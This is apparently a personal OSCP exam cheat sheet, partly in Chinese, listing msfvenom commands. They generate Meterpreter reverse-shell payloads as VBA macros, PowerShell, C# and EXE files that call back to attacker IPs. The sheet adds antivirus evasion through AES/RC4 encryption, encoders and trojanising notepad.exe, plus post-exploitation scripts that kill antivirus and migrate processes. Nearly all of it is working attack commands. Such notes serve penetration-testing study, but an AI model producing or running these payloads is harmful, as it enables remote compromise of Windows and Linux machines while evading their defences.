3-msfvenom - My-oscp-all-things

#msfvenom ### some type shellcode #### vba+macro ``` msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.49.57 LPORT=443 EXITFUNC=thread -f vbapplication -o test_vba ``` #### PS1 ``` msfvenom -p windows/meterpreter/reverse_https LHOST=ipaddress LPORT=443 EXITFUNC=thread -f ps1 -o test_ps msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.74 LPORT=443 EXITFUNC=thread -f ps1 ``` #### psh ``` msfvenom -p windows/meterpreter/reverse_https LHOST=ipaddress LPORT=443 EXITFUNC=thread -f psh -o run.txt ``` #### elf ``` linux/x64/meterpreter/reverse_tcp ``` #### csharp ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.57 LPORT=443 EXITFUNC=thread -f csharp ``` #### 编码、加密、捆绑 ``` msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.71 LPORT=4433 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f exe -o 4433.exe //可以 msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.176.134 LPORT=443 -e x64/zutto_dekiru -x /home/kali/notepad.exe -f exe -o /var/www/html/met64_notepad.exe msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 --encrypt aes256 --encrypt-key fdgdgj93jf43uj983uf498f43 -f exe -o /var/www/html/met64_aes.exe msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -e x86/shikata_ga_nai -f exe -o /var/www/html/met.exe msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -e x64/zutto_dekiru -f exe -o /var/www/html/met64_zutto.exe -e x86/shikata_ga_nai -i 3 --smallest --encrypt rc4 --encrypt-key thisisakey -e x64/zutto_dekiru -e x86/shikata_ga_nai ``` #### 长存 ``` set EnableStageEncoding true set StageEncoder x64/zutto_dekiru ``` #### script ``` set autorunscript post/windows/manage/killav set autorunscript post/windows/manage/migrate set autorunscript post/windows/gather/checkvm ``` #### 持久化 ``` excute -H -f notepad ``` ### 搭配路径 ``` PsExec.exe -s -i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe x86 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe x64 直接运行但payload需要选择x64 ```